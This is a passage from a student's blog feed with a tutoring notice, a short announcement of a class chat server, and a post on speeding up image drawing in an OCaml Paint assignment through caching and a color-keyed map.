
<h2 id="fall-2019spring-2020">Fall 2019/Spring 2020</h2>

<p>I tutor CIS 120 and CIS 160 in these semesters. For more information, please refer to The Tutoring Center.</p>

<h2 id="fall-2020spring-2021">Fall 2020/Spring 2021</h2>

<p>Tutoring is temporarily paused, as remote learning is taking a toll on everyone.</p>

<h2 id="summer-2021">Summer 2021</h2>

<p>Contact me via email and we can do remote learning, yay!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Tutoring" /><summary type="html"><![CDATA[Introducing free tutoring.]]></summary></entry><entry><title type="html">Public Chat Server</title><link href="http://0.0.0.0/blog/cis120-chat/" rel="alternate" type="text/html" title="Public Chat Server" /><published>2018-11-05T00:30:00-05:00</published><updated>2018-11-05T00:30:00-05:00</updated><id>http://0.0.0.0/blog/cis120-chat</id><content type="html" xml:base="http://0.0.0.0/blog/cis120-chat/"><![CDATA[<p>I just created a public server that you can all connect to using the given client <code class="language-plaintext highlighter-rouge">hw07-client.jar</code>.</p>

<!--more-->
<p><em>Updated 12/15/2018</em>: The server is now off. Thank you!</p>

<hr />

<p>The server address is <code class="language-plaintext highlighter-rouge">chat.hbang.wang</code>; just type it in when you boot up the client.</p>

<p>You will join a channel <code class="language-plaintext highlighter-rouge">All</code> by default, and you can’t leave the channel unless you quit the client.</p>

<p>Due to a limitation of the parser, nicknames and channel names cannot contain spaces<br />
(nor, of course, can any other name that fails <code class="language-plaintext highlighter-rouge">isValidName</code>).</p>

<p>This is also a good place for you to figure out the expected behavior of each action.</p>

<p>Have fun! If you have any other questions, feel free to comment below.</p>

<p><img src="/assets/images/chat/with-swap.png" alt="Chat with Swap" /></p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="CIS" /><category term="CIS120" /><category term="Java" /><category term="Server" /><summary type="html"><![CDATA[I just created a public server that you can all connect to using the given client hw07-client.jar.]]></summary></entry><entry><title type="html">Rajivelized Paint</title><link href="http://0.0.0.0/blog/cis120-paint/" rel="alternate" type="text/html" title="Rajivelized Paint" /><published>2018-10-27T02:50:00-04:00</published><updated>2018-10-27T02:50:00-04:00</updated><id>http://0.0.0.0/blog/cis120-paint</id><content type="html" xml:base="http://0.0.0.0/blog/cis120-paint/"><![CDATA[<h2 id="gui-in-ocaml">GUI in OCaml?</h2>

<p>This is the second most ridiculous thing I’ve heard since the dawn of civilization—the first is inventing Node.js.</p>

<!--more-->
<p>Well, in a few previous iterations of this class, the assignment obviously compiled to a desktop program, so we got all kinds of crappy serif fonts and an awful interface that didn’t even match the aesthetic of Windows® 98.</p>

<p>Luckily, we have JavaScript now, which is capable of interpreting ANYTHING. The typeface was changed to sans-serif, and with a <code class="language-plaintext highlighter-rouge">&lt;canvas&gt;</code> and <code class="language-plaintext highlighter-rouge">ocaml_to_js</code>, everything is beautiful now.</p>

<p><strong>NO!</strong> The code itself is disgusting! The course asks for a strict coding style, while the provided code is unformatted and mixed together like a pile of crap (partly attributable to the <code class="language-plaintext highlighter-rouge">Graphics</code> module).</p>

<p>As a result, I read through the code manually and fixed a dozen bugs, including the canvas not redrawing unless the user made a detectable movement, and the repaint function being invoked before the change was applied, which left the canvas always one frame behind.</p>

<p>Anyway, I have resolved most of the problems and updated the related libraries, so now we’re good to go.</p>

<h1 id="rajivelization">Rajivelization</h1>

<p align="center">
	<img alt="Rajiv in Paint" src="/assets/images/paint/demo.png" />
</p>

<h2 id="original-flavor">Original Flavor</h2>

<h3 id="generate-bitmap">Generate Bitmap</h3>

<p>Unfortunately, the <code class="language-plaintext highlighter-rouge">Graphics</code> module is so limited that we can’t load a PNG file into it. Therefore, after cutting out Rajiv in Photoshop (one of the purest pieces of software in the world, $20 a month w/ student discount, instant own), I wrote a little Go program to transform the PNG file with its alpha channel into an <code class="language-plaintext highlighter-rouge">(int * int * int) option list list</code>, where <code class="language-plaintext highlighter-rouge">None</code> means transparent (of course I could use something like <code class="language-plaintext highlighter-rouge">(-1, -1, -1)</code> to represent it, but tHaT’S nOt elEgaNt).</p>

<p>The pseudocode is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file := open_png(png_file)
bmp := bitmap(file)

print("let rajiv : (int * int * int) option list list = [")
for j := 0...height(bmp)
  print("[")
  for i := 0...width(bmp)
    r, g, b, a := rgba(bmp[i][j])
    if a = 0 then print("None;")
    else printf("Some(%d,%d,%d);", r, g, b)
  print("];")
print("]")
</code></pre></div></div>

<p>Now create a new <code class="language-plaintext highlighter-rouge">rajiv.ml</code> file and paste the printed code into it, and we are done generating the bitmap needed for the program.</p>

<h3 id="first-attempt">First Attempt</h3>

<p>My first attempt was a quick try with <code class="language-plaintext highlighter-rouge">Graphics.plot</code>, which simply draws one pixel in the current color (set with <code class="language-plaintext highlighter-rouge">Graphics.set_color</code>) at a given location. By the way, that handsome photo of Mr. Rajiv was resized to 100x100px, so every time the program has to draw ten thousand pixels individually. <em>Every time</em> here means every event, including <code class="language-plaintext highlighter-rouge">MouseMove</code>. The following code is a simple implementation of the idea.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">List</span><span class="p">.</span><span class="n">iteri</span> <span class="p">(</span><span class="k">fun</span> <span class="n">i</span> <span class="n">l</span> <span class="o">-&gt;</span>
  <span class="nn">List</span><span class="p">.</span><span class="n">iteri</span> <span class="p">(</span><span class="k">fun</span> <span class="n">j</span> <span class="n">c</span> <span class="o">-&gt;</span>
    <span class="k">match</span> <span class="n">c</span> <span class="k">with</span>
    <span class="o">|</span> <span class="nc">None</span> <span class="o">-&gt;</span> <span class="bp">()</span>
    <span class="o">|</span> <span class="nc">Some</span> <span class="p">(</span><span class="n">r'</span><span class="o">,</span> <span class="n">g'</span><span class="o">,</span> <span class="n">b'</span><span class="p">)</span> <span class="o">-&gt;</span>
      <span class="nn">Graphics</span><span class="p">.</span><span class="n">set_color</span> <span class="p">(</span><span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="n">r'</span> <span class="n">g'</span> <span class="n">b'</span><span class="p">);</span>
      <span class="nn">Graphics</span><span class="p">.</span><span class="n">plot</span> <span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">j</span><span class="p">)</span> <span class="p">(</span><span class="n">y</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span>
  <span class="p">)</span> <span class="n">l</span>
<span class="p">)</span> <span class="nn">Rajiv</span><span class="p">.</span><span class="n">rajiv</span>
</code></pre></div></div>

<p>This is clearly not a solution: by the third Rajiv drawn, the whole interface froze, and the user could no longer make any move.</p>

<h3 id="alternative-method">Alternative Method</h3>

<p>Looking for alternatives in the documentation, I found an interesting function called <code class="language-plaintext highlighter-rouge">Graphics.draw_image</code>, which takes a <code class="language-plaintext highlighter-rouge">Graphics.image</code> and draws it at a position. Hoping this would work well, I looked for the function that generates one, which is <code class="language-plaintext highlighter-rouge">make_image</code>. It takes a <code class="language-plaintext highlighter-rouge">Graphics.color array array</code> and turns it into an <code class="language-plaintext highlighter-rouge">image</code>. Notice that we also have <code class="language-plaintext highlighter-rouge">Graphics.transp</code> as a transparent color. This is exactly what we’re looking for!</p>

<p>Although we only learned <code class="language-plaintext highlighter-rouge">list</code> in class, it is easy to convert lists to arrays with <code class="language-plaintext highlighter-rouge">Array.of_list</code>. Two nested <code class="language-plaintext highlighter-rouge">List.map</code> calls are enough:</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">Graphics</span><span class="p">.</span><span class="n">make_image</span> <span class="p">(</span><span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
  <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">l</span> <span class="o">-&gt;</span>
    <span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
       <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">c</span> <span class="o">-&gt;</span>
         <span class="k">match</span> <span class="n">c</span> <span class="k">with</span>
         <span class="o">|</span> <span class="nc">None</span> <span class="o">-&gt;</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">transp</span>
         <span class="o">|</span> <span class="nc">Some</span> <span class="p">(</span><span class="n">r'</span><span class="o">,</span> <span class="n">g'</span><span class="o">,</span> <span class="n">b'</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="n">r'</span> <span class="n">g'</span> <span class="n">b'</span>
       <span class="p">)</span> <span class="n">l</span>
    <span class="p">)</span>
  <span class="p">)</span> <span class="nn">Rajiv</span><span class="p">.</span><span class="n">rajiv</span>
<span class="p">))</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">draw_image</code> is way faster than <code class="language-plaintext highlighter-rouge">plot</code>. However, every time* the program still has to turn a two-dimensional list into a 2D array, which is SUPER laggy: the image flashes every time* we make a move. This is still not acceptable.</p>
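<p>The lag comes from the conversion walking all 100x100 = 10,000 pixels and allocating a fresh array for every row each time it runs. Below is a minimal standalone sketch of the same conversion that needs no graphics window. It is an illustration, not the assignment code: <code class="language-plaintext highlighter-rouge">to_matrix</code> is a hypothetical name, and <code class="language-plaintext highlighter-rouge">transp</code> and <code class="language-plaintext highlighter-rouge">rgb</code> are passed in as parameters standing in for <code class="language-plaintext highlighter-rouge">Graphics.transp</code> and <code class="language-plaintext highlighter-rouge">Graphics.rgb</code>.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(* Hypothetical helper: the list-to-matrix conversion, with the Graphics
   values passed in so it can run without opening a window. *)
let to_matrix ~transp ~rgb (rows : (int * int * int) option list list)
    : int array array =
  rows
  |&gt; List.map (fun row -&gt;
         row
         |&gt; List.map (function
                | None -&gt; transp                 (* transparent pixel *)
                | Some (r, g, b) -&gt; rgb r g b)   (* opaque pixel color *)
         |&gt; Array.of_list)                       (* one array per row *)
  |&gt; Array.of_list                               (* array of rows *)
</code></pre></div></div>

<p>Every call does work and allocation proportional to width times height, which is why running it on every event is what hurts.</p>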

<h3 id="optimization">Optimization</h3>

<p>The fix is caching. We just need to store the converted image somewhere so that we don’t have to call <code class="language-plaintext highlighter-rouge">make_image</code> every time*. That is easier said than done, though, since <code class="language-plaintext highlighter-rouge">make_image</code> can’t be invoked at program start-up, when the <code class="language-plaintext highlighter-rouge">Graphics</code> module is not initialized yet.</p>

<p>Luckily, not everything in OCaml is immutable. We can create an <code class="language-plaintext highlighter-rouge">image option ref</code> and initialize it to <code class="language-plaintext highlighter-rouge">ref None</code>. The first time, we generate the image from the bitmap at runtime; every time* after that, we just take it from the cache. Problem solved: the Rajivs are now drawn extremely smoothly.</p>
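<p>The compute-once cache can be sketched generically like this. It is an illustration under assumptions, not the original code: <code class="language-plaintext highlighter-rouge">cached</code> is a hypothetical name, and <code class="language-plaintext highlighter-rouge">build</code> stands in for the <code class="language-plaintext highlighter-rouge">Graphics.make_image</code> call, which then only runs on the first request, after the window exists.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(* Hypothetical helper: wrap an expensive builder so it runs at most once.
   The option ref starts as None and is filled on the first call. *)
let cached (build : unit -&gt; 'a) : unit -&gt; 'a =
  let cache = ref None in
  fun () -&gt;
    match !cache with
    | Some v -&gt; v                 (* later calls: reuse the stored value *)
    | None -&gt;
      let v = build () in         (* first call: pay the cost once *)
      cache := Some v;
      v

(* Usage: a counting builder in place of Graphics.make_image. *)
let calls = ref 0
let get_image = cached (fun () -&gt; incr calls; Array.make_matrix 100 100 0)
</code></pre></div></div>

<p>The standard library's <code class="language-plaintext highlighter-rouge">Lazy</code> module packages the same idea: <code class="language-plaintext highlighter-rouge">lazy (...)</code> defers a computation, and <code class="language-plaintext highlighter-rouge">Lazy.force</code> evaluates it on first use and returns the memoized result afterwards.</p>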

<p align="center">
	<img alt="Smooth Rajiv in Paint" src="/assets/images/paint/demo2.png" />
</p>

<h2 id="chromajiv">Chromajiv</h2>

<p>Rajiv needs to be colorful, just like our lives. My idea was to use the color sliders as an offset to the photo’s original color, applied to each channel: \(RGB_{new} = \left(RGB_{old} + RGB_{offset}\right) \mod 256\).</p>
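<p>Applied per channel, the formula is a one-liner. The sketch below assumes every component is in the range 0..255 and that the offset tuple comes from the three sliders; <code class="language-plaintext highlighter-rouge">offset_color</code> is a hypothetical name.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(* Per-channel offset with wrap-around: (old + offset) mod 256.
   Assumes every component is already in 0..255. *)
let offset_color (r, g, b) (dr, dg, db) =
  ((r + dr) mod 256, (g + dg) mod 256, (b + db) mod 256)
</code></pre></div></div>

<p>For example, <code class="language-plaintext highlighter-rouge">offset_color (200, 10, 255) (100, 0, 1)</code> gives <code class="language-plaintext highlighter-rouge">(44, 10, 0)</code>: the red and blue channels wrap past 255 instead of saturating, so a large offset can turn a bright pixel dark.</p>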

<p>We can’t apply the exact same optimization this time, since the color changes and we only stored one image (w/ the original color) of Rajiv. However, we can use a database-like structure that stores key-value pairs, where the key is the offset color and the value is the image with that offset applied. The best tool for such a database is, for sure, a map.</p>

<p>OCaml provides the <code class="language-plaintext highlighter-rouge">Map.Make</code> functor for building a map with a custom ordered key type and a generic value type. We could, of course, use an <code class="language-plaintext highlighter-rouge">int</code> tuple as the key, but that would be less efficient. On a second look, <code class="language-plaintext highlighter-rouge">Graphics.color</code> is an alias of <code class="language-plaintext highlighter-rouge">int</code>, with the color packed as <code class="language-plaintext highlighter-rouge">0xRRGGBB</code>. This is a classic example of bit packing. Knowing that, we can get ourselves a beautiful <code class="language-plaintext highlighter-rouge">IntMap</code>.</p>
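<p>The <code class="language-plaintext highlighter-rouge">0xRRGGBB</code> layout is plain shifting and masking. Here is a minimal sketch that reproduces the encoding documented for <code class="language-plaintext highlighter-rouge">Graphics.color</code> without depending on the library; <code class="language-plaintext highlighter-rouge">pack</code> and <code class="language-plaintext highlighter-rouge">unpack</code> are hypothetical names.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(* Pack three 0..255 channels into one int laid out as 0xRRGGBB. *)
let pack r g b = (r lsl 16) lor (g lsl 8) lor b

(* Recover the channels by shifting right and masking the low 8 bits. *)
let unpack c = ((c lsr 16) land 0xFF, (c lsr 8) land 0xFF, c land 0xFF)
</code></pre></div></div>

<p>Since each distinct offset packs to a distinct int, the packed value works directly as an <code class="language-plaintext highlighter-rouge">IntMap</code> key, and comparing a single int is typically cheaper than comparing a tuple component by component.</p>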

<p>Every time*, we just check whether the map has the color we want. If not, we call <code class="language-plaintext highlighter-rouge">make_image</code> with the new offset and store the result in the map; otherwise, we just use the cached image. Now we have the flawless, aesthetic :heart:<em>chromajivelization</em>.</p>

<h3 id="implementation">Implementation</h3>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">module</span> <span class="nc">IntMap</span> <span class="o">=</span> <span class="nn">Map</span><span class="p">.</span><span class="nc">Make</span><span class="p">(</span><span class="k">struct</span> <span class="k">type</span> <span class="n">t</span> <span class="o">=</span> <span class="kt">int</span> <span class="k">let</span> <span class="n">compare</span> <span class="o">=</span> <span class="n">compare</span> <span class="k">end</span><span class="p">)</span>
<span class="k">let</span> <span class="n">rajiv_image</span> <span class="o">=</span> <span class="n">ref</span> <span class="nn">IntMap</span><span class="p">.</span><span class="n">empty</span>

<span class="k">let</span> <span class="n">draw_rajiv</span> <span class="p">(</span><span class="n">g</span><span class="o">:</span> <span class="n">gctx</span><span class="p">)</span> <span class="p">(</span><span class="n">cd</span><span class="o">:</span> <span class="n">color</span><span class="p">)</span> <span class="p">(</span><span class="n">p</span><span class="o">:</span> <span class="n">position</span><span class="p">)</span> <span class="o">:</span> <span class="kt">unit</span> <span class="o">=</span>
  <span class="k">let</span> <span class="p">(</span><span class="n">x</span><span class="o">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">=</span> <span class="n">ocaml_coords</span> <span class="n">g</span> <span class="n">p</span> <span class="k">in</span>
  <span class="k">let</span> <span class="n">c'</span> <span class="o">=</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="n">cd</span><span class="o">.</span><span class="n">r</span> <span class="n">cd</span><span class="o">.</span><span class="n">g</span> <span class="n">cd</span><span class="o">.</span><span class="n">b</span> <span class="k">in</span>
  <span class="k">if</span> <span class="n">not</span> <span class="p">(</span><span class="nn">IntMap</span><span class="p">.</span><span class="n">mem</span> <span class="n">c'</span> <span class="o">!</span><span class="n">rajiv_image</span><span class="p">)</span> <span class="k">then</span>
    <span class="n">rajiv_image</span> <span class="o">:=</span> <span class="nn">IntMap</span><span class="p">.</span><span class="n">add</span> <span class="n">c'</span> <span class="p">(</span><span class="nn">Graphics</span><span class="p">.</span><span class="n">make_image</span> <span class="p">(</span><span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
      <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">l</span> <span class="o">-&gt;</span>
        <span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
           <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">c</span> <span class="o">-&gt;</span> 
             <span class="k">match</span> <span class="n">c</span> <span class="k">with</span>
             <span class="o">|</span> <span class="nc">None</span> <span class="o">-&gt;</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">transp</span>
             <span class="o">|</span> <span class="nc">Some</span> <span class="p">(</span><span class="n">r'</span><span class="o">,</span> <span class="n">g'</span><span class="o">,</span> <span class="n">b'</span><span class="p">)</span> <span class="o">-&gt;</span>
               <span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="p">((</span><span class="n">r'</span> <span class="o">+</span> <span class="n">cd</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="ow">mod</span> <span class="mi">256</span><span class="p">)</span>
                            <span class="p">((</span><span class="n">g'</span> <span class="o">+</span> <span class="n">cd</span><span class="o">.</span><span class="n">g</span><span class="p">)</span> <span class="ow">mod</span> <span class="mi">256</span><span class="p">)</span>
                            <span class="p">((</span><span class="n">b'</span> <span class="o">+</span> <span class="n">cd</span><span class="o">.</span><span class="n">b</span><span class="p">)</span> <span class="ow">mod</span> <span class="mi">256</span><span class="p">)</span>
           <span class="p">)</span> <span class="n">l</span>
        <span class="p">)</span>
      <span class="p">)</span> <span class="nn">Rajiv</span><span class="p">.</span><span class="n">rajiv</span>
    <span class="p">)))</span> <span class="o">!</span><span class="n">rajiv_image</span><span class="p">;</span>
  <span class="nn">Graphics</span><span class="p">.</span><span class="n">draw_image</span> <span class="p">(</span><span class="nn">IntMap</span><span class="p">.</span><span class="n">find</span> <span class="n">c'</span> <span class="o">!</span><span class="n">rajiv_image</span><span class="p">)</span> <span class="n">x</span> <span class="n">y</span>
</code></pre></div></div>
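<p>One possible refinement, not part of the original code: the <code class="language-plaintext highlighter-rouge">mem</code> check followed by <code class="language-plaintext highlighter-rouge">find</code> looks the key up twice, while <code class="language-plaintext highlighter-rouge">IntMap.find_opt</code> (available since OCaml 4.05) does it in one lookup. In the standalone sketch below, <code class="language-plaintext highlighter-rouge">find_or_add</code> is a hypothetical helper and <code class="language-plaintext highlighter-rouge">build</code> stands in for the <code class="language-plaintext highlighter-rouge">make_image</code> call.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>module IntMap = Map.Make (struct type t = int let compare = compare end)

(* Hypothetical helper: return the cached value for [key], building and
   storing it on a miss. One lookup instead of mem + find. *)
let find_or_add (cache : 'a IntMap.t ref) (key : int) (build : int -&gt; 'a) : 'a =
  match IntMap.find_opt key !cache with
  | Some v -&gt; v                        (* hit: reuse the stored image *)
  | None -&gt;
    let v = build key in               (* miss: build once for this key *)
    cache := IntMap.add key v !cache;
    v

(* Usage: a counting builder in place of Graphics.make_image. *)
let builds = ref 0
let images : string IntMap.t ref = ref IntMap.empty
let build_image key = incr builds; Printf.sprintf "image for 0x%06X" key
</code></pre></div></div>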

<h1 id="demo">Demo</h1>

<h3 id="paint"><a href="/cis120-paint">Paint!</a></h3>

<p>I prefer not to publish my source code for this one. However, I managed to port the Paint JS file locally and made some alterations, so it now runs on a single page without the annoying pop-up. Feel free to try it out and comment below, or ask any questions via email.</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="CIS" /><category term="CIS120" /><category term="OCaml" /><category term="Coding" /><category term="GUI" /><summary type="html"><![CDATA[GUI in OCaml? This is the second most ridiculous thing I’ve heard since the dawn of civilization—the first is inventing Node.js.]]></summary></entry></feed>